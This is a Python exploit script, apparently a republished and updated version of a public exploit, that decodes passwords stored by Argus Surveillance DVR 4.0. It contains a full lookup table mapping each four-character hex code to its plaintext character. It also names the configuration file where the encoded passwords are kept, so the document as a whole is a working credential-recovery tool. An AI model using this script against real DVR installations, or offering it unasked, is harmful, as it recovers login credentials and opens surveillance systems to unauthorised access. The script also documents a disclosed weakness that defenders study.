import sys

########################################################################
# Original script heading                                              #
########################################################################
# Exploit Title: Argus Surveillance DVR 4.0 - Weak Password Encryption
# Exploit Author: Salman Asad (@deathflash1411) a.k.a LeoBreaker
# Date: 12.07.2021
# Version: Argus Surveillance DVR 4.0
# Tested on: Windows 7 x86 (Build 7601) & Windows 10
# Reference: https://deathflash1411.github.io/blog/dvr4-hash-crack

# Note: Argus Surveillance DVR 4.0 configuration is present in 
# C:\ProgramData\PY_Software\Argus Surveillance DVR\DVRParams.ini
########################################################################

# map out encoding scheme into a dictionary
# lower case, upper case, basic special characters
# Missing: #&"'
# The missing characters don't encode when using them in the password field

characters = {  
'ECB4':'1','B4A1':'2','F539':'3','53D1':'4','894E':'5',  
'E155':'6','F446':'7','C48C':'8','8797':'9','BD8F':'0',  
'C9F9':'A','60CA':'B','E1B0':'C','FE36':'D','E759':'E',  
'E9FA':'F','39CE':'G','B434':'H','5E53':'I','4198':'J',  
'8B90':'K','7666':'L','D08F':'M','97C0':'N','D869':'O',  
'7357':'P','E24A':'Q','6888':'R','4AC3':'S','BE3D':'T',  
'8AC5':'U','6FE0':'V','6069':'W','9AD0':'X','D8E1':'Y',
'C9C4':'Z',  
'F641':'a','6C6A':'b','D9BD':'c','418D':'d','B740':'e',  
'E1D0':'f','3CD9':'g','956B':'h','C875':'i','696C':'j',  
'906B':'k','3F7E':'l','4D7B':'m','EB60':'n','8998':'o',  
'7196':'p','B657':'q','CA79':'r','9083':'s','E03B':'t',  
'AAFE':'u','F787':'v','C165':'w','A935':'x','B734':'y',
'E4BC':'z',
'B398':'!','78A7':'@','D9A8':'$','30F6':'%','F7DF':'^',
'F79A':'*','D474':'(','4BEE':')','3B76':'-','ECEC':'_',
'A638':'=','7359':'+','6CF7':'[','6889':'{','C98C':']',
'B352':'}','A1F8':'\\','6248':'|','D8F2':';','D885':':',
'44C4':',','DB5F':'<','3E84':'.','F8C7':'>','76D0':'/',
'57E5':'?'} 

# Original Banner for Author credit
banner = '''
#########################################
#    _____ Surveillance DVR 4.0         #
#   /  _  \_______  ____  __ __  ______ #
#  /  /_\  \_  __ \/ ___\|  |  \/  ___/ #
# /    |    \  | \/ /_/  >  |  /\___ \  #
# \____|__  /__|  \___  /|____//____  > #
#         \/     /_____/            \/  #
#        Weak Password Encryption       #
############ @deathflash1411 ############
#                                       #
# Updated by S3L33                      #
#########################################

'''

# save the length of arguements
arg_len = len(sys.argv)

# Check the hash length to ensure its valid before calling the
# decode function

def pass_len_check(encoded_password):
    if (len(encoded_password)%4) != 0:
        print("[!] Error, check your password hash")
        return
    else:
        decode(encoded_password)

# Decode the encoded password

def decode(encoded_password):
    split = []
    n = 4
    password = ""
    for index in range(0, len(encoded_password), n):
        split.append(encoded_password[index : index + n])
    for key in split:
        if key in characters.keys():
            password += ''.join(characters[key])
            print("[+] " + key + ":" + characters[key])

        else:
            print("[-] " + key + ":Unknown")
    print("\r\n[+] Password: {0}".format(password))



print(banner)
pass_len_check(sys.argv[1])